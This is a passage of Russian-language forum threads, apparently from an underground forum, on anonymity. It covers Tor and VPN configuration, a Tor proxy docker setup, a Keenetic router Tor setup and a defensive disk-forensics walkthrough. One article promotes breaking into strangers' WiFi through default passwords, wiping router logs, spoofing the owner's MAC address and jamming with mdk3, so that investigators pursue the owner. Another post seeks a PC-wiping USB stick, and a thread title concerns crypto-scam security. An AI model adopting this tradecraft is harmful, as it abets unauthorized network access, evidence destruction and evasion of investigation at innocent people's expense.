3. **MaxCircuitDirtiness 600
Purpose:** Limits the lifespan of Tor circuits to 600 seconds before automatic replacement.

Reason: Regularly cycling circuits improves user anonymity by preventing long-term traffic correlation, thereby thwarting tracking attempts by adversaries.

4.DisableDebuggerAttachment 1
Purpose: Prevents debuggers from attaching to the Tor process.

Reason: Mitigates the risk of malicious actors using debuggers to analyze or manipulate Tor's operations, thereby bolstering system security.

5.EntryNodes {US}, {CA}, {FR}
Purpose: Specifies Tor to primarily use entry nodes from the US, Canada, and France.

Reason: Provides geographic control over entry points into the Tor network, which is crucial for users seeking to align traffic paths with specific legal jurisdictions.

6.ExitNodes {NL}, {DE}, {UK}
Purpose: Directs Tor to use exit nodes located in the Netherlands, Germany, and the United Kingdom.

Reason: Similar to EntryNodes, this setting allows users to influence where traffic exits the Tor network, catering to preferences for accessing region-specific content or ensuring data privacy.

7.UseEntryGuards 1
Purpose: Ensures Tor employs entry guards, a subset of reliable entry nodes for initial network access.

Reason: Enhances security by reducing exposure to potentially compromised entry nodes, thereby safeguarding against attacks targeting entry point vulnerabilities.

8.ClientOnly 1
Purpose: Restricts Tor to operate solely as a client, disabling relay or exit node functionalities.

Reason: Essential for users focused solely on anonymous browsing, minimizing the system's exposure within the Tor network and reducing operational complexity.

9.MaxClientCircuits 200
Purpose: Sets a cap on the number of circuits Tor clients can concurrently establish.

Reason: Controls resource consumption, optimizing performance and stability by managing the volume of active circuits and ensuring efficient network utilization.

Best Regards !

~./Enjoy!

Перейди по ссылке, и я узнаю твой номер

ID: 676533bbb4103b69df37194b
Thread ID: 117718
Created: 2024-06-27T18:47:56+0000
Last Post: 2024-07-01T10:31:40+0000
Author: grozdniyandy
Replies: 5 Views: 1K

Значит у меня в телефоне последний иос и чекал я сайты знакомств (у меня реги нигде нет). Вдруг в мой номер пришло сообщение от сайта на который меня редиректнуло (имя сайта не оставлю). Этот сайт тоже сайт знакомств и они написали "У вас появилась подписка, мы будем снимать столько-то в месяц"

По ходу есть какой то 0дей который позволяет видеть номер через сафари если нажмёшь на ссылку (в моём случаи был редирект). Нашел я похожий случай с иос14: [https://i.blackhat.com/USA21/Wednes...erent-Pwning-IOS-14-With- Generation-Z-Bug.pdf](https://i.blackhat.com/USA21/Wednesday- Handouts/us-21-Hack-Different-Pwning-IOS-14-With-Generation-Z-Bug.pdf)

В последние дни, очень много странных вещей происходят. Этот случай тоже весьма странный, "Почему сайту знакомств такое?", "Скажем массово распространяют малварь, а нельзя было бы тупо сообщение всем отправить?". Чё то ничего не совпадает.

Кароч возвращаемся в прошлое и пользуемся мотороллой.

П.С. Ничего официального про это нет, это просто случай который со мной случился

Проверяем надежность бесплатных VPN (NordVPN, PrivateTunnel, GoldenFrog)

ID: 676533bbb4103b69df37195e
Thread ID: 26174
Created: 2018-10-03T13:25:58+0000
Last Post: 2024-06-01T14:02:47+0000
Author: xrahitel
Replies: 1 Views: 1K

Tестил три vpn но что не понял не х.. они все палят первый,второй,третий :wacko: кто вообще проверял отпишите тут....странно но сука psiphon3 - этот тыц не палиться через сниф траффа так понимаю он не имеет виртуального адаптера TAP тогда получается все vpn логи видит опсос куда вы выходите... контент зашифрован, а вот все заголовки в чистом виде, HOST все видно, куда я ходил,если вы заходите на сайт где стоит http то опсос всё видит,Ваш vpn бесполезен,решил поставить Dnscrypt ситуация улучшилась тыц есть ещё simplednscrypt но его тестил...

Телеграм, Tor

ID: 676533bbb4103b69df371960
Thread ID: 104098
Created: 2023-12-14T22:30:47+0000
Last Post: 2024-06-01T08:00:22+0000
Author: testerov
Replies: 10 Views: 1K

установите Tor Browser на свой ПК. Запустите Tor Browser и подождите, пока он установит подключение к сети Tor. Когда соединение будет установлено, вы увидите сообщение "Connected to the Tor network!".

Затем вам нужно добавить прокси-настройки в Telegram. Откройте настройки в приложении Telegram и найдите раздел "Подключение". В разделе "Адрес" введите значение 127.0.0.1, в разделе "Порт" введите значение 9150. Затем активируйте опцию "Использовать прокси-сервер". Сохраните изменения и перезапустите Telegram. Теперь весь трафик Telegram будет направляться через сеть Tor, при использовании телеграм у вас всегда должен быть включен тор.

VPN > RDP не работает, в чем проблема?

ID: 676533bbb4103b69df371961
Thread ID: 115714
Created: 2024-05-30T17:19:44+0000
Last Post: 2024-05-31T09:21:06+0000
Author: error 404
Replies: 12 Views: 1K

Всем привет!
Развернул свой WireGuard VPN на сервере и захотел с него подключится к своему RDP , но не вышло.
Старый RDP клиент пишет что не удается зайти потому что RDP выключен, более новый RDP клиент пишет что соединение разорвано потому что подключился другой пользователь (чего быть не может)
А по факту на другом впн или вообще без него все прекрасно работает.
Подскажите пожалуйста, в чем может быть проблема?

как отключить gps в ноуте?

ID: 676533bbb4103b69df371963
Thread ID: 113616
Created: 2024-04-30T21:59:51+0000
Last Post: 2024-05-29T15:51:31+0000
Author: proffesor_green
Replies: 11 Views: 1K

собственно стало инетресно, можно ли вырубить геолокацию на ноуте? А то ставишь мега супер впн, а обычный запрос по локации бьется на раз, и что удивительно, с точностью до пары метров.
я так понял в винде аппаратно это не сделать. (недостаточно просто передвинуть сторожок в положеное выкл.)
может есть какой то софт для постоянной подмены подмены? Расширения для браузера не в счет, нужно именно чтобы весь комп определялся в другой локации.

Medusa: многопотоковый Tor-прокси

ID: 676533bbb4103b69df371969
Thread ID: 91800
Created: 2023-07-01T07:10:08+0000
Last Post: 2024-05-21T23:57:39+0000
Author: g-man-original
Prefix: Мануал/Книга
Replies: 0 Views: 1K

Сегодня мы рассмотрим, как получить безотказный тор прокси с высокой скоростью. Если вы пробовали качать через один инстанс tor. То вы видели:
- Скорость падает постоянно, да и вообще она не высокая.
- Часто коннект рвется

И люди придумали некий механизм позволяющий решить все эти проблемы. Данный софт построен на базе трех софтов с открытыми исходными кодами, ну кроме тора конечно. Но мы ему доверяем, правда же?

Будем использовать:
- Tor (сам тор из основного репозитория)
- HAProxy (балансер)
- Privoxy (для доступности http прокси)

Схема будет выглядеть так:

Приступим у установке и использованию. Нам понадобится, только docker.

docker run \
-p 8800:8800 \
-p 8888:8888 \
-p 1080:1080 \
-p 2090:2090 \
datawookie/medusa-proxy

Click to expand...

Устанавливает и запускает медузу со следующими портами.

8800 — Список прокси инстансев
8888 — HTTP прокси
1080 — SOCKS прокси
2090 — HAProxy статистика.

Для пользования нам нужны только 8888 и 1080. Балансировшик на этих портах работает автоматически.

Можно так же запускать по отдельности или без лишних портов.

HTTP прокси

docker run -p 8888:8888 datawookie/medusa-proxy

SOCKS прокси

docker run -p 1080:1080 datawookie/medusa-proxy

HTTP и SOCKS прокси

docker run -p 8888:8888 -p 1080:1080 datawookie/medusa-proxy

Click to expand...

Проверить работу прокси можно в консоли через курл

export http_proxy=http://127.0.0.1:8888
curl http://httpbin.org/ip

Click to expand...

Продвинутый режим

docker run \
-e HEADS=4 \
-e TORS=3 \
-p 8800:8800 \
-p 8888:8888 -p 8889:8889 -p 8890:8890 -p 8891:8891 \
datawookie/medusa-proxy

Click to expand...

HEADS - указывает количество проксей не связанных друг с другом. В каждой из прокси, свой балансировщик и свои инстансы.
TORS - количество инстансев тора, который будут использоваться для балансировщика для одной прокси. Данный параметр можно просто использовать с первой или последующими командами, что были вверху статьи.

У меня все, безопасной вам работы

Virtual Machine vs Dockers

ID: 676533bbb4103b69df37196a
Thread ID: 113716
Created: 2024-05-02T04:26:56+0000
Last Post: 2024-05-19T04:32:53+0000
Author: ValeraSnowdrop
Replies: 13 Views: 1K

Почему сообществом считается нормой использовать VM, но не использовать контейнеры?
Я не нашел упоминаний об использовании контейнеров вместо VM в рабочих машинах пользователей. Такие инструменты как docker могут иметь преимущества над использованием VM. Я думаю что благодаря этому можно прибавить в функциональности/производительности отдельных кубов(контейнеров/VM) немного потеряв в безопасности, но не потеряв в анонимности. Знаете ли вы случаи использования контейнеров для построения системы для работы?

Публичный ВПН (Public VPN)

ID: 676533bbb4103b69df37196e
Thread ID: 111020
Created: 2024-03-21T23:39:23+0000
Last Post: 2024-05-16T21:20:32+0000
Author: mosta
Replies: 19 Views: 1K

Вопрос немного нубский, но прошу не пинать. Если я гипотетически юзаю паблик впн, то есть риски, что могут перехвать мои логины, пароли, сид фразы итд?

Конфигурация роутера, запросы через прокси, впн

ID: 676533bbb4103b69df371970
Thread ID: 111708
Created: 2024-04-01T10:01:11+0000
Last Post: 2024-05-15T11:28:53+0000
Author: Russian_Coder
Replies: 11 Views: 1K

Всех приветствую! Возник такой вопрос возможно ли сделать так чтобы при подключение к вайфавую на роутере все шло через прокси сервер или впн, возможно я говорю не корректно и такое в целом невозможно, не бейте палками я в этом не силен.

Tor, Keenetic

ID: 676533bbb4103b69df371971
Thread ID: 86765
Created: 2023-04-27T08:15:34+0000
Last Post: 2024-05-14T08:47:19+0000
Author: Feedel
Prefix: Статья
Replies: 9 Views: 1K

Всем привет
в данной статье показано как установить непосредственно на роутер кинетик и раздачи ТОРа

P.S статья не моя

Вариант 1

Заходим по ssh на Keenetic и выполняем следующие команды:

opkg update
opkg install tor polipo
Редактируем файл /opt/etc/tor/torrc (пример базовой настройки)

SOCKSPort 9050 # Default: Bind to localhost:9050 for local connections.
SOCKSPort 192.168.1.1:9100 # Bind to this address:port too.
RunAsDaemon 1
DataDirectory /opt/var/lib/tor
#User tor
Редактируем файл /opt/etc/polipo/config (пример базовой настройки)

proxyAddress = "0.0.0.0" # IPv4 only
allowedClients = 127.0.0.1, 192.168.1.0/24
socksParentProxy = "localhost:9050"
socksProxyType = socks5
dnsQueryIPv6 = no
dnsUseGethostbyname = yes
Стартуем сервисы

/opt/etc/init.d/S28polipo
/opt/etc/init.d/S35tor
Настраиваем браузер (в примере FireFox)

Вариант 2. за-tor-енная точка доступа

прим.:

TOR - имя интерфейса (произвольное, задаем любое свое)

pass-tor - пароль доступа к сети (мин. 8 символов, задаем любой свой, если надо)

tor-net - имя Wi-Fi сети (произвольное, задаем любое свое)

172.16.2.1 - IP-адрес точки доступа (произвольный, задаем любой свой, не должен пересекаться с существующими)

Подключаемся к CLI Keenetic`a

Выбираем интерфейс беспроводной сети

interface WifiMaster0/AccessPoint2
Переименовываем интерфейс в TOR

name TOR
Устанавливаем уровень безопасности сети - private

security-level private
Устанавливаем алгоритм безопасности WPA2(если надо)

encryption wpa2
Включаем шифрование Wi-Fi-трафика (если установили алгоритм безопасности)

encryption enable
Устанавливаем ключ доступа к сети (если выполнили 2 предыдущих комманды, что выше)

authentication wpa-psk pass-tor
Устанавливаем ip-адрес точки доступа

ip address 172.16.2.1 255.255.255.0
Устанавливаем SSID беспроводной сети

ssid tor-net
Активация интерфейса TOR

up
Для автоматической раздачи IP создаем DHCP pool и привязываем его к интерфейсу TOR. Создаем DHCP-пул

ip dhcp pool TOR
Устанавливаем диапазон IP адресов

range 172.16.2.50 172.16.2.100
Привязываем созданный пул к интерфейсу TOR

bind TOR
Для применения всех настроек нужно отключить и включить модуль Wi-Fi

Отключить

interface WifiMaster0 down
Включить

interface WifiMaster0 up
Сохраняем

system configuration save
Заходим по ssh на Keenetic и выполняем следующие команды:

opkg update
opkg install tor iptables
Редактируем файл /opt/etc/tor/torrc :

SOCKSPort 9050
SOCKSPort 192.168.1.1:9100

RunAsDaemon 1

DataDirectory /opt/var/lib/tor

#User tor

AutomapHostsOnResolve 1
DNSListenAddress 172.16.2.1
DNSPort 9053
TransListenAddress 172.16.2.1
TransPort 9040
VirtualAddrNetwork 10.192.0.0/10
Создаем файл /opt/etc/ndm/netfilter.d/010-tor-net.sh со следующим содержанием:

#!/opt/bin/sh

iptables -t nat -A PREROUTING -i ra2 -p udp --dport 53 -j REDIRECT --to-ports 9053
iptables -t nat -A PREROUTING -i ra2 -p tcp --syn -j REDIRECT --to-ports 9040
прим.: ra2 - имя созданного интерфейса (просмотреть можно командой ifconfig)

Делаем файл исполняемым

chmod +x /opt/etc/ndm/netfilter.d/010-tor-net.sh
Перезагружаем Keenetic и пробуем...

Портативный wifi sim+vpn

ID: 676533bbb4103b69df371975
Thread ID: 113873
Created: 2024-05-04T15:49:00+0000
Last Post: 2024-05-08T14:43:54+0000
Author: qwe1237
Replies: 14 Views: 1K

Всем привет.
Не могу топик один найти с обсуждением девайса...
Уже готовы закидать меня тапками, но обьясню...

Как то обсуждали (возможно не на этом борде) Очень удобный девайс портативный роутер с поддержкой сим карт и разных протоколов безопастности. Который был очень удобный и безопастный, но почему не помню...
Выглядел вроде как шайба, но возможно путаю.
Понятно что можно юзать openwrt да и в массмаркете хватает роутеров с поддержкой сим и внп в том числе и портативных.
Но интерес в "супер безопастных" удобных, быстрых, и отлично работающих в снг в 2024 году. (что немало важно) чтобы в один прекрастный день не лешится доступа в связи с блокировкой очередного впн протокола.

Замаскировать тор от провайдера

ID: 676533bbb4103b69df37197b
Thread ID: 112383
Created: 2024-04-10T15:54:13+0000
Last Post: 2024-04-24T20:30:21+0000
Author: ValentineC
Replies: 16 Views: 1K

Переодически сижу с тора + впн, напрягает мысль о том что провайдер видит активное его использование, есть какие то варианты чтоб замаскировать тор траффик? Кроме впн + виртмашины

Безопасность в сети , флешка

ID: 676533bbb4103b69df37197f
Thread ID: 111612
Created: 2024-03-30T17:02:50+0000
Last Post: 2024-04-11T08:57:42+0000
Author: Koko_toh
Replies: 16 Views: 1K

приветствую всех, видел когда-то в одном из постов что можно создать загрузочную флешку при подключении которой удаляются все файлы с пк/ноутбука . Не смог найти инфы по поводу такого софта. Знаю что можно создать флешку которая делает замыкание и палит платы с диском. Если у кого-то есть информация прошу поделится , буду благодарен

(Или же быстрые способы удаления всех данных с пк/ноута, без возможности восстановления инфы с дисков)

Снимаем и Анализируем дамп жесткого диска

ID: 676533bbb4103b69df371980
Thread ID: 109617
Created: 2024-03-04T08:06:44+0000
Last Post: 2024-04-10T16:31:50+0000
Author: defaultuser0
Prefix: Статья
Replies: 8 Views: 1K

Работает Криминалист!
Снимаем и Анализируем дамп жесткого диска

Авторство: defaultuser0

Источник: xss.is

Приветствую форумчане! Продолжаю делится своими знаниями преобретенными работая специалистом по информационной безопасности.
Это вторая часть про работу с дампами первую часть про Анализ дампа оперативной памяти можете почитать тут -> ТЫК

В этой части я покажу боевой пример на виртуалке которая будет поражена одним вирусом0) Я проведу полный анализ и покажу как выглядит классическое расследование таких инцидентов
Для интереса статьи : Я попросил своего знакомого закинуть на виртуалку любой вирус который будет оставться в системе как файл (Ратник, Ботнет)
Я просил его не лупить на полную (с криптом и инжектом в легитимный процесс) так как это очень сильно усложнит мне задачу.
Все как всегда чутка теории + практика!

Жесткий диск компьютера содержит множество ценной информации, от личных данных до важных деловых документов. Понимание того, как извлекать и анализировать эти данные, может быть критически важным для различных целей: от восстановления потерянных файлов до проведения криминалистического анализа в рамках расследований. Снимок жесткого диска, или дамп, позволяет создать точную копию всех данных на диске в определенный момент времени. Этот процесс не только помогает в сохранении данных, но и позволяет детально анализировать содержимое диска без риска для оригинальных данных. В данной статье мы рассмотрим, как корректно снимать дамп жесткого диска и какие инструменты и методы анализа.

Я уже писал в первой части про аппартаный блокиратор записи и о плюсах и мунусах в первой части:

Поэтому советую все таки прочитать первую часть. Не вижу смысла дублировать один и тот же материал

Еще раз хочу напомнить что я описываю пример работы аналитиков и специалистов SOC/CERT
Все статьи которые я пишу это чисто мой практический опыт в SOC'e, возможно найдутся тут узконаправленные специалисты по форензике - был бы рад если вы опишите эти процессы более подробнее чем я.

Давайте сразу приступим к практике!

Снимаем Дамп Жесткого Диска:

Предварительно я уже поразил вирусом виртуальную машину! Давайте разберемся как снять дамп.
Запускаем известный нам FTK Imager и выбираем в нем функцию Create Disk Image ссылку на скачивание оставлю ниже

Перед тем как снять дамп вы должны понимать что вы не можете записать дамп на жесткий диск с которого вы и снимаете свой дамп, Проще говоря вам нужно 2 диска:

С которого снимаете

В который записываете его

Подключение второго жесткого диска к системе, с которой снимается дамп, не обязательно, но настоятельно рекомендуется по нескольким причинам:

При создании дампа жесткого диска важно обеспечить, чтобы копия данных не перезаписывала любые существующие файлы или данные на исходном диске. Использование второго жесткого диска помогает избежать риска случайной потери данных на рабочем диске

Снимок жесткого диска может быть очень большим и его создание может занять значительное время. Сохранение дампа на отдельный физический диск может улучшить производительность, поскольку операции чтения и записи не будут конкурировать за пропускную способность одного и того же диска

Если дамп сохраняется на другой физический диск, можно лучше изолировать исходные данные от любых процессов, которые могут привести к их изменению во время создания дампа

Простое удобство, сам второй диск позволит вам вернуть первый диск условно компании, а вы уже потом можете делать с ним (копией) что хотите (создавть еще копии, анализировать, модифицировать и тд...)

НО! как всегда есть но...
Мы с вами не тупые люди и понимаем что при работе с жесткими дисками, особенно если существует подозрение на наличие вредоносных программ они (вредоносы) могут перенести себя на второй жесткий диск. Тут как говориться смотря что нам нужно или сохранить информацию на диске или получить семпл вредоноса.
Чтобы минимизировать риск заражения второго жесткого диска вирусом с исходного диска, можно следовать нескольким рекомендациям:

При создании дампа жесткого диска используйте методы прямого копирования, которые не вовлекают исполнение какого-либо кода с исходного диска. Это означает использование низкоуровневых утилит копирования, которые не интерпретируют данные на диске, а просто переносят биты информации

Подключите исходный жесткий диск в режиме только чтения. Это предотвратит любые попытки записи данных на диск, которые могут включать вредоносное ПО. На рынке есть спец аппараты и ПО, которые позволяют подключать диски в режиме только чтения.

Используйте отдельную, изолированную систему для создания и анализа дампа жесткого диска. (Изъять исходный диск, подкючить к изолированной системе и запустить прцесс снятия дампа)

Как вы понимаете везде есть плюсы и минусы и следуют действовать от конкретной ситуации. В моем случаи я хочу получить и понять где находится вредонос в системе, так как я знаю что система уже пораженна.

Так как я использую Виртуальную машину я сделаю все проще, дам виртуальной машине доступ к сетевой директории основного хоста

Продолжим процесс снятия дампа.
В появившемся окне выбираем тип источника.

Тут мы можем выбрать что нам нужно, снять дамп с физического диска, логического, образа диска (iso) или же конкретную директорию диска. ну или вообще древняк ДВД СД =)
Далее выбираем сам диск

Теперь нам нужно указать куда мы будем сохранять дамп и в каком виде, нажимаем add.

Тут мы можем указать тип, Raw это - в чистом виде, за остальные 3 сказать ничего не могу, так как никогда ими не пользовался.

Тут мы можем указать допалнительную информацию (иногда полезно особенно когда их много)

Теперь мы вибираем куда мы будем записывать дамп, а так же указываем 0 чтобы ФТК не фрагментировал данные.

Прошу заметить что у меня пишется дамп в сетевую папку - это плохой кейс и так делать не следует (но я так делаю...)

Теперь нажимаем старт и идем занимается другими делами (особенно если диск больше 1ТБ)

Ого не прошло и пол века и у нас все на месте!

Советую хэши сохранять, бывает полезно когда дампов 1001шт.
Так же прошу заметить что записалось ровно 60гб = дамп в полном виде.

Вот как они выглядят и что находиться в текстовом файле:

Теперь давайте приступим к анализу!

Анализируем Дамп Жесткого Диска:

Запускаем ftk imager на изолированной системе и выбираем пункт - Add Evidence Item...

Теперь уже тут выбираем образ и сам наш файл дампа который мы успешно перенесли на диск

И перед нами уже безвредный дамп в чистом виде. Теперь мы можем приступить к детальному его анализу!

Теперь самое интересное, открываем самый большой партишон (в моем случаи который на 60ГБ) и делаем первое и самое главное это получаем сэмпл MFT файла системы!

MFT - Главная таблица файлов. В MFT есть по крайней мере одна запись для каждого файла в томе файловой системы NTFS, включая сам MFT. Вся информация о файле, включая его размер, метки времени и даты, разрешения и содержимое данных, хранится либо в записях MFT, либо в пространстве за пределами MFT, описываемого записями MFT.
Почитать подробнее про MFT можете тут -> [ТЫК](https://learn.microsoft.com/ru-ru/windows/win32/fileio/master-file- table)

Выгружаем этот файл и приводим его в нормальный вид (Нормальный я имею ввиду csv формат файла)

Для того чтобы привести MFT в читабельный формат воспользуемся прекрасной утилитой от очень крутого парня =) У него вообще тона полезного софта для форензики и не только
Называется она MFTECmd. Я приложу ниже под этой статьей все ссылки
Открываем cmd от админа и вводим такую команду:

Code:Copy to clipboard

MFTECmd.exe -f "Название сырого файла" --csv "куда? директорию" --csvf "Название обработанного файла"

Теперь все от того же парня качаем утилиту Timeline Explorer (Ссылка сами знаете где)
Предварительно поставьте нужную версию .NET'a
Переносим туда наш csv файл.

Мы получаем удобную таблицу со всеми метками путями датами и тд, давайте сразу прыгнем в наш любимый темп =)

Пробегаемся по всему темпу и смотрим есть ли что то подозрительное, в моем случаи нет :/
Я на фоне продолжаю искать по всему диску в самых популярных местах хоть какой то след, а пока я это делаю опишу вам другой способ
Прибегаем к Prefetch.

Prefetch — это компонент операционной системы Windows, используемый для оптимизации времени загрузки приложений. Механизм Prefetch анализирует, какие программы и файлы часто используются, и на основе этих данных предварительно загружает части этих программ и файлов в память при старте системы. Это позволяет ускорить запуск часто используемых приложений.
Логи Prefetch содержат информацию о загружаемых программах, включая время запуска приложения, частоту его использования и связанные файлы. Эти данные сохраняются в специальных файлах с расширением .pf в директории C:\Windows\Prefetch
Поэтому бежим в FTK Imager выгружать Prefetch =)

Вот эта директория ее прям с корнями выдергиваем и следующим этапом ставим WinPrefetchViwer
В WinPrefetchViwer открываем Advanced Options и берем папку которую мы сняли Prefetch c дампа.

Перед нами список в Вверхней части список файлов Prefetch с датой времени их создания модификации путем и тд, в нижней части список файлов с которым конкретный файл pf взаимодействовал.

Я все продолжаю искать где мой знакомый оставил следы...
Пока я это делаю еще один пример, анализируем реестер.

Для того чтобы получить весь реестер бежим в FTK Imager по пути Windows\System32\config

Тут мы с корянми всю директорию, но честно говоря мне щас нужно только SOFTWARE
Получив нужные файлы их надо так же привести в нормальный вид, для этого я буду использовать RegRipper
Тут мы берем файл реестра и получаем выход в виде txt уже автоматически проанализрованный на аномалии..

Открыв файл я продолжаю проводить анализ и искать аномалии, можно посмотреть автозапуск (Ратники и Ботнеты без этого не могут)

Если вы анализируете боевой Жесткий Диск компании то веротянее всего у них включенны журнал логгирования или sysmon.
Советую всем если вам попал в руки такой дамп первым делом так же брать эту директорию и изучать их.

Спустя N-ое время я нашел в логах упоминания процесса explorer.exe =)

И как раз зафиксированное последнее время было 06:45 +- 10 мин мой знакомый сидел на той самой вируталке

Сложив 2+2 я достал эти файлы и понял насколько меня считает мой знакомый за дебила..
Буду откровенным я искал просто во всех черных дырах, листал весь реестер пытался понять что и где, но как говориться если хочешь что то спрятать, спрячь на видном месте =)

Само собой при запуске Диспетчера задач или Process Hacker или ему подобные программы, Вируса небыло видно. (нетстат нервно курит в сторонке)

Закинув дернутый мной explorer.exe на Вирус Тотал я выиграл Джекпот

Это и был тот самый вирус, удолось определить что это RAT.

Само собой у вас логичный вопрос где смотреть(?)
Я приложу сюда табличку куда стоит смотреть в первую очередь при анализе дампов жесткого диска:
Так же советую смотреть журналы виндовс.

Master File Table| Главная таблица
---|---
Prefetch| Информация о загружаемых программах
UsnJrnl| Журнал выполняемых действий
Windows\System32\winevt\Logs| Логи журналов
Windows\System32\config| Реестр

Если вы добрались до журнала Security то обязательно смотрите на ID связанные с аутентификацией пользователя (4768,4771,4624,4625,4672)
Особенно обращйте внимание на такие ID где видно как локальный админ зашел в систему (4672)

Все так-же RDP ID изучайте внимательно, обычно продавцы доступов и плохие ребята пользуються слабыми аутентификационными данными и получают доступ в сеть компании или же единичного хоста из за них.
Подключение RDP ID (4778)
Отключение RDP ID (4779)

И еще очень важно!! Очистка журнала (этим тоже хацкеры пользуються и создание запланированных событий)
Очистка журнала ID (1102,104)
Создано запланированное событие ID (4698)

Все что связанно с Powershell и Политиками так же смотрите если у вас есть там доступ.
Вообще поставьте как шпаргалку это и с этим в руках бегайте по логам =)

Что касается всей этой операции, это очень долгий душный процесс, особенно если вы анализируете огромное количество дампов с жестких дисков +- по 200ГБ-1ТБ
Всем тем кто хочет начать свой путь в форензике советую читать отчеты и пытаться проходитиь CTF!

Всем спасибо кто прочитал!

Для тех кто хочет поддержать меня финансово:
BTC: bc1qxzw0u2hl40hxpw0zjz82zzkl5mgjtp9xwkex6f

Мой ТГ канал со стримами и полезной инфой:

TG: t.me/infosecetochto

До скорого!

Сравнение рисков работы через модем и работы через чужой WiFi

ID: 676533bbb4103b69df371989
Thread ID: 97018
Created: 2023-08-31T20:32:49+0000
Last Post: 2024-03-26T15:42:14+0000
Author: Knew100
Prefix: Статья
Replies: 19 Views: 1K

Сравнение рисков работы через модем и работы через чужой WiFi

Статья эта в планах была давно, да всё времени небыло. Сейчас, когда прошивка и линукс практически доведены до абсолюта, за исключением рабочих моментов настало время плотненько пографоманствовать. В этой статье я постараюсь дать ответ на вопрос зачем переходить с модемов на работу с чужих точек доступа и какие это дает тактические преимущества.

Для кухонных теоретиков и мамкиных хакеров.

Начну пожалуй с того, что развею миф о том что это невозможно. Основных аргументов в пользу этой дичи обычно два:

1. Адаптеры могут подключаться только к соседу за стенкой.
2. Это очень сложно и чтобы взломать чужую точку нужно голову размером как у лошади.

Разберем оба высера подробнее.

Первый основан на том, что кухонные теоретики никогда не работали с нормальным оборудованием. Да, действительно, адаптер ноутбука видит очень мало точек и может подключиться только к соседу за стенкой. Однако не составляет особого труда заморочиться и купить нормальное оборудование, которое стреляет подальше чем за стенку.

^ Адаптер на чипсете ar9271 с антенной с коэффициентом усиления 5 dBi - таким можно работать на дистанции в десятки метров.

Второй основан на отсутствии практического опыта (кстати помимо заблуждения "сломать вайфай невозможно" есть и другое "я поставлю кали линукс и умою тебя изи пизи" - как первое так и второе говорит о полном отсутсвии практического опыта мамкиных хакеров). Врать не буду, научится за 5 минут взламывать вайфай не получится. Там нет какой то волшебной таблетки и вникать все же придется. Но и пять недель там изучать тоже особо нечего. Если тебя учит практик, то тебе достаточно позаниматься с ним 3-5 занятий по пару часов каждое, после чего ты уже сможешь мало мало киберхулиганить себе вайфайки для работы самостоятельно.

Отсутствие геолокации

Первое тактическое преимущество - отсутствие точной геолокации. Основа модема или сотового телефона - радиомодуль. Это то, куда ты пихаешь сим карту. Прошивка радиомодуля настроена таким образом, что каждые 15 секунд происходит сканирование эфира и сравнение мощности сигнала всех доступных базовых станций. После чего радиомодуль либо переподключается к станции с более мощным сигналом, либо продолжает работать через текущую станцию, если ее сигнал перекрывает остальные. По истории этих запросов и выясняют перемещение абонента.

В мобильном телефоне по мимо этого есть еще и GPS модуль, а гражданские модули дают точность до метра (военные GPS спутники дают вообще 15 см погрешность). Вот почему не нужно использовать мобильный для раздачи интернета и следует отдать предпочтение модемам, если работа через чужой WiFi невозможна.

При работе же через чужие точки доступа о метровой точности определения вашей геолокации не может идти и речи. От точки вы находитесь на расстоянии в десятки или даже сотни метров (да, это не так круто как втирают в рекламных буклетах продавцы адаптеров и антенн - заявляя о работе на сверхдальние дистанции в 4, 12 а иногда и 54 километра. В городе много помех, неудобный ландшафт а источник радиопередач маломощен). Но это в десятки или сотни раз менее точная геолокация, чем при работе через модем.

^ Адаптер на чипсете ar9271 с антенной с коэффициентом усиления 5 dBi и адаптер на чипсете rt3070 с антенной с коэффициентом усиления 8 dBi - второй уже позволяет работать на сотни метров.

Отсутствие логов

На многих роутерах логи просто выключены. Люди настолько беспечны что часто это просто изумляет меня. На админках либо нет паролей, либо стоят дефолтные admin-admin / admin-1234.

Но даже если логгирование включено это небольшая проблема, так как роутеры не имеют энергонезависимых носителей информации на борту. Достаточно после сеанса перезагрузить его через консоль управления и логи безвовзратно теряются.

Отсутствие платежей.

За чужой вифи не нужно платить. И основной плюс тут не в экономии, а в том что часто допускают ошибку и платят с рабочих или личных кошельков за симку, вместо того чтобы оплачивать ее с терминала. Это дает вероятному противнику еще одну вескую улику.

Сложность пеленгации

Левая симка и левый модем не дают тебе защиты. Так как с помощью анализа таймингов можно без труда выяснить тввой реальный телефон. Или телефон твоей жены. Или соседа. Причесать его и получить данные о тебе. Подробнее можно прочитать тут ссылка

Живучесть

Работая через чужие точки сложно остаться без интернета. Отключив тебе симку вероятный противник может получить тактическое преимущество - ты останешься без связи с командой.

При работе через вайфай ты не можешь остаться без интернета - даже при минимальном пуле в пять точек какая то будет доступна и ты оперативно сможешь получить/передать критически важную информацию.

При этом отключение симки не демаскирует противника и ты подумаешь что симку просто блокнули, она же "левая". А вот если он начнет глушить диапазон 2.4 или еще и 5 ггц до кучи это сразу его демаскирует. Когда я балуюсь mdk3 ор в домах в округе стоит адов

^ Адаптер на чипсете rt3070 с антенной типа "Волновой канал" (Яги-Уда) с коэффициентом усиления 16 dBi. Такая антенна дает стабильный сигнал даже на сверхдальних дистанциях но требует "треноги" - штатива для точного наведения на источник сигнала.

Отсутствие идентификаторов

В логах роутера адаптер оставляет всего два параметра - hostname и mac адрес. Оба подделает даже ребенок, что во первых дает тебе возможность взять себе такие же ID как у владельца точки, например мак и хостнейм его ноутбука. А во вторых это не такая весомая доказуха - ну мак как у меня и что. Да я любой вам мак нарисую какой надо.

А вот с айдишками модема уже все печально. Во первых их около пятнадцати. И изменив там аймей ты ровном счетом нихера не получаешь, кроме ненужного внимания (не обманываешь ли ты с тарифами, пихая безлимит в модем).

Во вторых айдишки модема это железобетонная доказуха - заспуфить сразу 15 параметров твоего модема не может не только школьник, а вообще никто не может. Так что если ты их засветил и модем нашли у тебя при обычке - самое время огорчаться и горевать.

Некритичность утечки чужих идентификаторов

Ну и наконец самый важный плюс работы через точки - некритичность утечки айдишек. Даже если ты спалил айпишку точки - это еще не приговор. Во первых сначала отработают самого владельца. Понятно, что он будет орать что его хакеры взломали, но кто ему поверит то. А пока его будут работать у тебя есть время нарисовать ноги и сменить место жительства.

Если брать модель TL-WN722N, то только первая ревизия, вторая - деньги на ветер. Но зачем зацикливаться на этой модели? Берёшь любую из моделей, перечисленных здесь. Например, альфовские на чипсете Ralink RT3070, и нет проблем.

Сорс - https://labrc . name/threads/sravnenie-riskov-raboty-cherez- modem-i-raboty-cherez-chuzhoj-wifi.88898/

Безопасность для криптоскама

ID: 676533bbb4103b69df37198e
Thread ID: 88748
Created: 2023-05-24T03:36:15+0000
Last Post: 2024-03-22T17:20:10+0000
Author: xlokimean
Replies: 17 Views: 1K

